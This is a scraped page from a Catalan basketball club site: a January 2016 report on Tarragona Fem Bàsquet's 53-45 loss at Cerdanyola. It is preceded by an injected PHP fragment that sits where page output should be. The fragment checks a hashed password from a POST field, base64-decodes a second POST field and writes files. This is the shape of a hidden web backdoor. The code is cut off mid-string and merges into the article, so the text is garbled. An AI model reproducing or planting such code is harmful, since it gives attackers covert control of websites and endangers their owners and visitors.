function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Tarragona Fem Bàsquet perd a Cerdanyola en un partit intranscendent (53-45) - Tgn Bàsquet Club -

El Tarragona Fem Bàsquet perd a Cerdanyola en un partit intranscendent (53-45)

Updated: gener 23, 2016

No hi havia res en joc però a ningú li agrada perdre. El Tarragona Fem Bàsquet va caure a la pista del Cerdanyola, un equip que jugarà a la segona fase per l’ascens i, per tant, un triomf de les liles no hauria comptabilitzat a l’hora de jugar per evitar el descens. Era, per tant, un partit que, pel que fa al resultat pròpiament dit era intranscendent però que, en canvi, era molt important a l’hora de mantenir les sensacions, una dinàmica de joc favorable.

Les locals van afrontar el partit amb un esperit de tranquil·litat, conscients que la victòria tampoc comptabilitzaria en la segona fase i amb la classificació del grup d’ascens ja assegurada. Amb tot, el matx va ser interessant. Les noies que entrena Albert del Rey van competir molt bé i només la falta d’encert en atac en moments importants -el gran problema de l’equip durant tot el curs- va evitar el triomf.

El Tarragona Fem Bàsquet va sortir molt fort. Un 0-4 gràcies a un tir lliure i un triple de Fouty donava el primer avantatge a les visitants en un partit que, però, va tenir un ritme de joc lent i un tempteig baix. De fet, el Cerdanyola, que té tres jugadores de gran nivell, sempre juga a evitar que el matx s’acceleri, tot aprofitant el talent individual. El Tarragona Fem Bàsquet va acabar jugant a allò que volia el seu adversari que va acabar el primer període dominant per 14-10. Va ser un període on una de les millors tarragonines, Laura Pascual, va patir un cop a la mandíbula que la va mantenir apartada del partit durant gran part de la primera meitat. Tierno, que va ocupar el seu lloc, la va suplir molt bé però no va poder evitar -ella i la resta de l’equip- arribar al descans per sota en el marcador (30-24).

En el segon quart el Cerdanyola només va ser castigat amb 1 falta personal mentre que el Tarragona Fem Bàsquet en va cometre 4. Al final del matx, les locals van acabar amb una xifra d’11 faltes i les visitants amb 21.

En la segona meitat, el Cerdanyola va pressionar a tres quarts de pista després d’anotar i això va dificultar una mica el joc tarragoní que, però, sempre va estar a prop del seu rival (41-35 al final del tercer quart). Amb tot, les liles no culminaven la remuntada, fallaven quan podien empatar o capgirar el resultat i això va donar confiança al Cerdanyola. La falta de punteria del perímetre (2/12 en triples) va facilitar la feina de les locals que van situar una defensa molt tancada -aquesta és una de les característiques del seu joc- i Fouty, molt activa en la primera meitat, va perdre protagonisme en la segona part.

A un minut i mig per acabar el partit, el Tarragona Fem Bàsquet es va situar a només 5 punts del Cerdanyola (50-45), però va rebre un triple decisiu i no va estar encertat en atac i va acabar encaixant una nova derrota.